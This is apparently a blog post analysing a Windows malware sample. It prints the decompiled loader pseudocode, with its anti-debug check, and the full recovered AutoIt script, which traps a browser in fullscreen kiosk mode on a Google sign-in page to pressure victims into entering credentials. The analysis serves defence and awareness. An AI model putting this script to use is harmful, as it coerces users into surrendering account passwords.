Operator in Cookie Han Hoan
Admin in Cyber Mely, CyberSpace
Forensic at @World Wide Flags
Malware Analysis - Real Case 4
Hi everyone, this article is the next one I want to share to all of you. I analysed this malware yesterday, and I just saw a post of Whitehat about it, so I think it’s really important that I need to share how I analysed this malware so that you can know how to prevent from it! Let’s go!
Sample: click here to see it
First, I checked malware information:
There’s still nothing interesting, next I used IDA to analyse:
sub_402A32(lpCmdLine); is the most suspicious thing, I checked it immediately and I found an interesting thing:
int __stdcall sub_402A32(void *a1)
{
char v1; // bl
int v2; // ecx
HWND ForegroundWindow; // eax
const WCHAR *v5; // [esp-10h] [ebp-20048h]
const WCHAR *v6; // [esp-Ch] [ebp-20044h]
char v7; // [esp+11h] [ebp-20027h] BYREF
char v8; // [esp+12h] [ebp-20026h]
char v9; // [esp+13h] [ebp-20025h] BYREF
LPWSTR FilePart; // [esp+14h] [ebp-20024h] BYREF
LPCWSTR lpParameters[4]; // [esp+18h] [ebp-20020h] BYREF
LPCWSTR lpFile[4]; // [esp+28h] [ebp-20010h] BYREF
WCHAR Buffer[32768]; // [esp+38h] [ebp-20000h] BYREF
WCHAR v14[32768]; // [esp+10038h] [ebp-10000h] BYREF
sub_40A961(lpFile);
v1 = 0;
v7 = 0;
v8 = 0;
GetCurrentDirectoryW(0x7FFFu, Buffer);
sub_402E37(a1, &v9);
if ( IsDebuggerPresent() )
{
MessageBoxA(0, "This is a third-party compiled AutoIt script.", Caption, 0x10u);
return sub_40988F(lpFile);
}
if ( dword_4D1400 )
{
if ( dword_4D1400 == 1 )
{
sub_4075AC(1, dword_4D1408, -1);
byte_4D2392 = byte_4D1364;
goto LABEL_6;
}
if ( (unsigned __int8)sub_402DE3(&lpFileName, &dword_4D1400, v2, &v7) )
{
v8 = HIBYTE(word_4D2390);
byte_4D1404 = word_4D2390;
GetFullPathNameW(lpFileName, 0x7FFFu, v14, &FilePart);
sub_406B57(FilePart);
v1 = v7;
LABEL_6:
if ( sub_401CD0(&lpFileName, dword_4D1400) )
{
sub_403D1B(&word_4D2390);
SetCurrentDirectoryW(Buffer);
dword_4D135C = 1;
return sub_40988F(lpFile);
}
if ( v8 != 1 || (unsigned __int8)sub_461663() || v9 )
{
sub_402B83();
sub_402C63();
if ( !byte_4D1404 )
sub_403837(&dword_4D1990);
sub_40D760(1);
if ( !byte_4D1404 )
sub_4030F2(&dword_4D1990);
}
else
{
sub_403A5A(lpFile);
sub_409CB3(&unk_4C2224);
if ( v1 )
{
sub_4033C6("\"");
sub_406350(&lpFileName);
sub_4033C6("\"");
}
else
{
sub_4033C6(a1);
}
v6 = lpParameters[0];
v5 = lpFile[0];
ForegroundWindow = GetForegroundWindow();
ShellExecuteW(ForegroundWindow, L"runas", v5, v6, Buffer, 1);
sub_40988F(lpParameters);
}
sub_403D1B(&word_4D2390);
goto LABEL_13;
}
dword_4D135C = 1;
}
else
{
dword_4D135C = -1;
}
LABEL_13:
SetCurrentDirectoryW(Buffer);
return sub_40988F(lpFile);
}
In this function, the first condition will check if there’s any debugger was used, if yes it will print “This is a third-party compiled AutoIt script.”. This is one of the techniques that was used to antt debug, and if you want to debug it without being catched by this condition, you can install Scyllahide - a plugin was created to anti anti-debug. But in this case it’s not necessary, because there’s a good thing to look. Because of the string This is a third-party compiled AutoIt script., I’ve known that it was compiled by AutoIT, and there’s a tool help us analyse this type of malware. Open it, import exe file and this is what I got:
Local $url = "https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password"
Local $primarybrowser = ""
Local $primaryclass = ""
If FileExists("C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe") Or FileExists("C:\Program Files\Microsoft\Edge\Application\msedge.exe") Then
$primarybrowser = "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
$primaryclass = "[CLASS:Chrome_WidgetWin_1]"
ElseIf FileExists("C:\Program Files (x86)\Google\Chrome\Application\chrome.exe") Or FileExists("C:\Program Files\Google\Chrome\Application\chrome.exe") Then
$primarybrowser = "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe"
$primaryclass = "[CLASS:Chrome_WidgetWin_1]"
ElseIf FileExists("C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe") Or FileExists("C:\Program Files (x86)\BraveSoftware\Brave-Browser\Application\brave.exe") Then
$primarybrowser = "C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe"
$primaryclass = "[CLASS:Chrome_WidgetWin_1]"
Else
Exit
EndIf
If StringInStr($primarybrowser, "msedge.exe") Then
Run($primarybrowser & " --kiosk --edge-kiosk-type=fullscreen --no-first-run --disable-features=TranslateUI --disable-popup-blocking --disable-extensions --no-default-browser-check --app=" & $url)
Else
Run($primarybrowser & " --kiosk --disable-features=TranslateUI --disable-infobars --no-first-run --disable-popup-blocking --disable-extensions --no-default-browser-check --app=" & $url)
EndIf
Sleep(0x7d0)
Local $hwnd = WinGetHandle($primaryclass)
While 0x1
If Not WinExists($hwnd) Then
If StringInStr($primarybrowser, "msedge.exe") Then
Run($primarybrowser & " --kiosk --edge-kiosk-type=fullscreen --no-first-run --disable-features=TranslateUI --disable-popup-blocking --disable-extensions --no-default-browser-check --app=" & $url)
Else
Run($primarybrowser & " --kiosk --disable-features=TranslateUI --disable-infobars --no-first-run --disable-popup-blocking --disable-extensions --no-default-browser-check --app=" & $url)
EndIf
Sleep(0x7d0)
$hwnd = WinGetHandle($primaryclass)
EndIf
WinSetOnTop($hwnd, "", 0x1)
If Not WinActive($hwnd) Then
WinActivate($hwnd)
EndIf
Sleep(0x1f4)
WEnd
Let’s analyse step by step:
- First, they created $url variable which redirects you to Google signup screen
- Second, there’re 3 conditions to check which browser in our computer: msedge, chrome or brave
- After locating the browser, it was executed with specific command-line options to optimize the kiosk experience. The –kiosk option launched the browser directly into kiosk mode, while –edge-kiosk-type=fullscreen ensured that this mode occupied the entire screen. Additional options such as –no-first-run and –disable-popup-blocking were included to disable certain features, creating a more streamlined and user-focused kiosk environment.
- The script then pauses for a moment using Sleep(0x7d0) (which is 2000 milliseconds or 2 seconds) to allow the browser to start.
- It retrieves the handle of the browser window using WinGetHandle($primaryclass).
- The script enters an infinite while loop (While 0x1).
- If the browser window no longer exists (If Not WinExists($hwnd)), it reruns the browser with the same conditions as before and reacquires the window handle.
- The script uses WinSetOnTop($hwnd, “”, 0x1) to keep the browser window on top of all other windows.
- If the browser window is not active, it activates the window using WinActivate($hwnd).
- The script pauses briefly (500 milliseconds) in each iteration to avoid consuming too much CPU.
- The loop continues indefinitely, ensuring the browser remains open, on top, and active in kiosk mode.
Because of kiosk mode, many people cannot escape from signup screen, they don’t have choice except signup their account, and in that time attackers can do many things: steal sensitive data…
Summary:
MITRE ATT&CK: T1036.003, T1012, T1082.
IOC: 1cf0747ce1310fd989b24a93d2108784efb003948fdec1f7e64479213075cb90.
Thank you for reading my blog! See you in the next article in the future. Bye 🫀🫀🫀!!